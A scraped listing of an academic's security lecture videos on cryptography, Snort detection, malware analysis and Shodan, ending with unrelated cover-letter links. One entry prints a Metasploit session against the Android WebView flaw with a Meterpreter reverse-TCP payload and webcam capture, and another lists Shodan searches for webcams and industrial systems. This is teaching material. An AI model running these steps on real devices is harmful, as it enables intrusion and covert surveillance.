Home
Videos uploaded by user “Bill Buchanan OBE”
Snort with PCap files
 
03:44
This presentation shows how you can using Snort with a Pcap file. The details are at: http://asecuritysite.com/forensics/advf
Views: 8511 Bill Buchanan OBE
PBKDF2
 
05:38
Web page: http://asecuritysite.com/encryption/PBKDF2
Views: 3581 Bill Buchanan OBE
VMware vSphere: Using the PowerCLI
 
08:06
This provides a short demo of using the PowerCLI in vSphere. Commands used: # Connect-VIServer -Server [server] -User [user] -password [password] # Set-ExecutionPolicy RemoteSigned # get-vm # get-datastore # get-template # get-resourcepool # get-location # new-vm -name [name] -datastore [store] -template [temp] -resourcepool [res] -DiskStorageFormat thin -location [loc] # start-vm [name] # shutdown-vmguest [name]
Views: 12194 Bill Buchanan OBE
Why EDE in 3DES?
 
04:33
Views: 837 Bill Buchanan OBE
Encryption: ECB v CBC
 
08:36
http://asecuritysite.com/subjects/chapter58 I forgot to add the key to each of the stages of CBC.
Views: 15063 Bill Buchanan OBE
Wireless Power: dBm, mW and dBW
 
09:35
The demo is at: http://www.asecuritysite.com/calculators/dbm
Views: 12694 Bill Buchanan OBE
Tripwire Demo
 
06:37
Tripwire Demo
Views: 11771 Bill Buchanan OBE
Android and Exploit Example (WebView)
 
10:26
The video outlines the Android WebView addJavascriptInterface Code execution Vulnerability: http://asecuritysite.com/subjects/chapter46 Note you may need to use: webcam_snap -i 1 To use Camera 1. Commands used: msfconsole msf - use exploit/android/browser/webview_addjavascriptinterface msf exploit(webview_addjavascriptinterface) - show options Module options (exploit/android/browser/webview_addjavascriptinterface): Name Current Setting Required Description ---- --------------- -------- ----------- Retries true no Allow the browser to retry the module SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- AutoLoadAndroid true yes Automatically load the Android extension LHOST yes The listen address LPORT 4444 yes The listen port RetryCount 10 yes Number of trials to be made if connection failed Exploit target: Id Name -- ---- 0 Automatic msf exploit(webview_addjavascriptinterface) - set LHOST 192.168.0.24 msf exploit(webview_addjavascriptinterface) - set URIPATH Security msf exploit(webview_addjavascriptinterface) - exploit
Views: 24304 Bill Buchanan OBE
Cracking RSA with CRT
 
05:30
https://asecuritysite.com/encryption/crackrsa4 https://asecuritysite.com/encryption/chinese
Views: 2275 Bill Buchanan OBE
Telephone Scam (12 Nov 2016)
 
03:32
A recorded call of me talking to a scammer on 12 Nov 2016 (8:30am): https://www.linkedin.com/pulse/youre-scammer-dont-call-security-prof-saturday-morning-buchanan
Views: 637 Bill Buchanan OBE
Chosen Cipher Attack on RSA
 
08:10
Example: https://asecuritysite.com/encryption/c_c
Views: 3185 Bill Buchanan OBE
Using Snort to Detect Wanna Cryptor
 
02:48
Try here: https://asecuritysite.com/forensics/snort?fname=wanna.pcap&rulesname=wanna.rules
Views: 1089 Bill Buchanan OBE
Introduction to Malware Analysis
 
01:31:38
http://asecuritysite.com/subjects/chapter26
Views: 19556 Bill Buchanan OBE
Diffie Hellman Method
 
08:05
http://asecuritysite.com/encryption/diffie and here is how you select G: https://youtu.be/-TjSuch3VGU
Views: 937 Bill Buchanan OBE
ASCII, Hex, Base-64, Binary, and so on.
 
09:23
ASCII, Hex, Base-64, Binary, and so on: http://www.asecuritysite.com/Coding/asc http://www.asecuritysite.com/Coding/asc2 http://www.asecuritysite.com/Coding/ascii http://www.asecuritysite.com/Coding/num
Views: 3852 Bill Buchanan OBE
Tor Network Key Exchange - Curve25519
 
05:18
https://asecuritysite.com/encryption/curve
Views: 570 Bill Buchanan OBE
Demo of Shodan
 
04:00
https://asecuritysite.com/encryption/shodan
Views: 2016 Bill Buchanan OBE
Oblivious Transfer
 
11:48
http://asecuritysite.com/encryption/ot
Views: 1427 Bill Buchanan OBE
Intro to Sec. and Net. Forensics: 2 IDS (HD)
 
50:34
This is the second chapter from the Introduction to Security and Network Forensics book by Prof Bill Buchanan. Book: Introduction to Security and Network Forensics, ISBN: 084933568X. There is more information at: http://asecuritybook.com/unit02.html
Views: 2075 Bill Buchanan OBE
Implementation of Homomorphic Encryption: Paillier
 
11:27
https://asecuritysite.com/encryption/pal_ex
Views: 1711 Bill Buchanan OBE
Intro to Sec. and Net. Forensics: 2 IDS
 
50:34
The HD version is at: http://youtu.be/IguN0dFZ23I This is the second chapter from the Introduction to Security and Network Forensics book by Prof Bill Buchanan. Book: Introduction to Security and Network Forensics, ISBN: 084933568X. There is more information at: http://asecuritybook.com/unit02.html
Views: 2158 Bill Buchanan OBE
Command Line Searching With Shodan
 
07:46
https://asecuritysite.com/encryption/shodan shodan count "port:443" shodan search "uc-httpd" --limit 10 shodan count "product:apache city:Edinburgh" shodan search "product:mysql" shodan search "category:ics country:US" shodan search "device:webcam city:Edinburgh" shodan search "port:102" -- Fields shodan search --fields ip_str,port,org "uc-http" --limit 10 shodan search --fields ip_str,org "port:80 os:Linux city:Edinburgh country:GB" --limit 10 shodan search --fields ip_str,org "port:21 city:Edinburgh product:nginx" --limit 10 --- Facets shodan stats --facets port device:webcam --limit 5 shodan stats --facets country device:webcam --limit 5 shodan stats --facets port product:apache --limit 5 shodan stats --facets domain product:apache --limit 5 shodan stats --facets org product:apache --limit 5
Views: 1440 Bill Buchanan OBE
.NET Remoting Tutorial Part 2
 
03:20
The notes for this are at: http://buchananweb.co.uk/dotnet_remoting.pdf and the PPT at: http://buchananweb.co.uk/dotnetremoting_ppt.pdf The source code is at: http://buchananweb.co.uk/remoting.zip .NET Remoting Part 1 http://youtu.be/K0ncj74YFto Part 2: http://youtu.be/2NFmTmV4II8 Part 3: http://youtu.be/4n70wVyKjIs Part 4: http://youtu.be/bqirnCLqZQg The main presentation is at: http://www.youtube.com/watch?v=lJph_kKQTQA
Views: 1929 Bill Buchanan OBE
Microsoft .NET: Remoting
 
58:48
The notes for this are at: http://buchananweb.co.uk/dotnet_remoting.pdf and the PPT at: http://buchananweb.co.uk/dotnetremoting_ppt.pdf The source code is at: http://buchananweb.co.uk/remoting.zip .NET Remoting Part 1 http://youtu.be/K0ncj74YFto Part 2: http://youtu.be/2NFmTmV4II8 Part 3: http://youtu.be/4n70wVyKjIs Part 4: http://youtu.be/bqirnCLqZQg The main presentation is at: http://www.youtube.com/watch?v=lJph_kKQTQA More details at: http://www.asecuritysite.com/security/information/dotnet
Views: 20405 Bill Buchanan OBE
Ephemeral Diffie-Hellman with RSA (DHE-RSA)
 
10:10
Details and basic calculator: http://asecuritysite.com/encryption/dhe
Views: 2299 Bill Buchanan OBE
Introduction to Cryptography: Part 1 - Private Key
 
26:13
This outlines private key encryption and some key cracking. Part 2 is at: https://www.youtube.com/watch?v=HKQLBUAGbeQ Code examples are at: http://asecuritysite.com/encryption
Views: 8320 Bill Buchanan OBE
Sky News Interview (13 May 2017) on Ransomware
 
04:06
https://www.linkedin.com/pulse/smb-hangs-its-head-shame-when-william-buchanan
Views: 805 Bill Buchanan OBE
Security Snippets: ElGamal
 
07:34
Security Snippets: ElGamal The example is at: http://www.asecuritysite.com/Encryption/elgamal
Views: 7612 Bill Buchanan OBE
Detailed Analysis of Heartbleed with IDS Detection
 
13:21
This presentation provides a detailed analysis of Heartbleed and how to use Snort, in an off-line mode, with signatures, to detect the threat. More details at: http://asecuritysite.com/Encryption/heart3
Views: 574 Bill Buchanan OBE
Quantum Robust: Winternitz one time signature scheme (W-OTS)
 
08:23
https://asecuritysite.com/encryption/wint
Views: 480 Bill Buchanan OBE
Introduction to Cryptography: Part 4 (Public Key, PKI and Identity)
 
22:29
More details at: http://asecuritysite.com/encryption and specifically at: http://asecuritysite.com/encryption/dc
Views: 5387 Bill Buchanan OBE
IT Innovation in Edinburgh (BBC Scotland)
 
06:19
BBC Scotland (c). All rights reserved. First shown: 28 April 2015. BBC Scotland's excellent coverage innovation in the IT industry, especially focused on Jamie Coleman and Codebase. Related article: https://www.linkedin.com/pulse/edinburgh-cultured-educated-beautiful-city-cyber-age-william-buchanan
Views: 845 Bill Buchanan OBE
Ethereum: Sharding and Casper
 
14:46
https://www.linkedin.com/pulse/how-do-you-upgrade-speeding-car-engine-run-10-times-prof-bill/
Views: 494 Bill Buchanan OBE
Padding in Ciphers
 
10:23
https://asecuritysite.com/encryption/padding
Views: 1518 Bill Buchanan OBE
Homomorphic Encryption
 
06:47
http://asecuritysite.com/encryption/pal https://asecuritysite.com/encryption/homomorphic https://asecuritysite.com/encryption/h_rsa
Views: 1117 Bill Buchanan OBE
Cisco PIX/ASA
 
34:09
Cisco PIX/ASA
Views: 5863 Bill Buchanan OBE
Intro to Sec. and Net. Forensics: 7 Introduction to Risk (HD)
 
50:18
This is the seventh chapter from the Introduction to Security and Network Forensics book by Prof Bill Buchanan. There is more information at: http://asecuritybook.com/unit07.html Book: Introduction to Security and Network Forensics, ISBN: 084933568X. This lecture is also part of a lecture series at Edinburgh Napier University.
Views: 2181 Bill Buchanan OBE
MSc in Advanced Security and Digital Forensics - 2012
 
04:34
In 2010 we created the MSc in Advanced Security and Digital Forensics, and it is now one of the most successful MSc programmes in Cyber Security in the UK
Views: 357 Bill Buchanan OBE
Eve The Magician Cracks A Tunnel - Bleichenbacher's attack
 
08:04
http://asecuritysite.com/encryption/c_c3
Views: 1136 Bill Buchanan OBE
Security: Malware Analysis
 
01:08:16
This presentation gives an overview of how malware can be analysed. The associated site is at http://asecuritysite.com/subjects/chapter14
Views: 30778 Bill Buchanan OBE
Elliptic Curve Diffie Hellman (ECDH) with secp256k1
 
08:12
http://asecuritysite.com/encryption/ecdh2
Views: 851 Bill Buchanan OBE
Salting Passwords
 
04:56
The Web page is here: http://asecuritysite.com/encryption/opensslp
Views: 1261 Bill Buchanan OBE
Android and Metasploit
 
13:56
Details at: http://asecuritysite.com/subjects/chapter29 Note you may need to use: webcam_snap -i 1 to use Camera 1.
Views: 2983 Bill Buchanan OBE
Data Loss Prevention 1 - Fundamentals
 
35:49
http://asecuritysite.com/dlp
Views: 3122 Bill Buchanan OBE
Introduction to zkSnarks
 
12:32
https://asecuritysite.com/encryption/zksnark01 https://asecuritysite.com/encryption/zksnark02
Views: 2489 Bill Buchanan OBE
Zero Knowledge Proof and Diffie Hellman
 
12:17
https://asecuritysite.com/encryption/diffiez
Views: 470 Bill Buchanan OBE
VMware Lab: Setting up Vyatta Firewall and Protecting against Attacks
 
01:02:55
The lab is here: http://asecuritysite.com/ns/day1 and the lab: https://dl.dropboxusercontent.com/u/40355863/day01_lab01.pdf
Views: 9411 Bill Buchanan OBE
Using Snort to Detect SMB Propagation for WannaCry
 
12:12
http://asecuritysite.com/subjects/chapter90
Views: 2419 Bill Buchanan OBE

Sample cover letter early childhood teacher
Investment banking cover letter uk
How to write a cover letter for a resume samples
Entry level programmer cover letter examples
Cover letter for hr officer job summary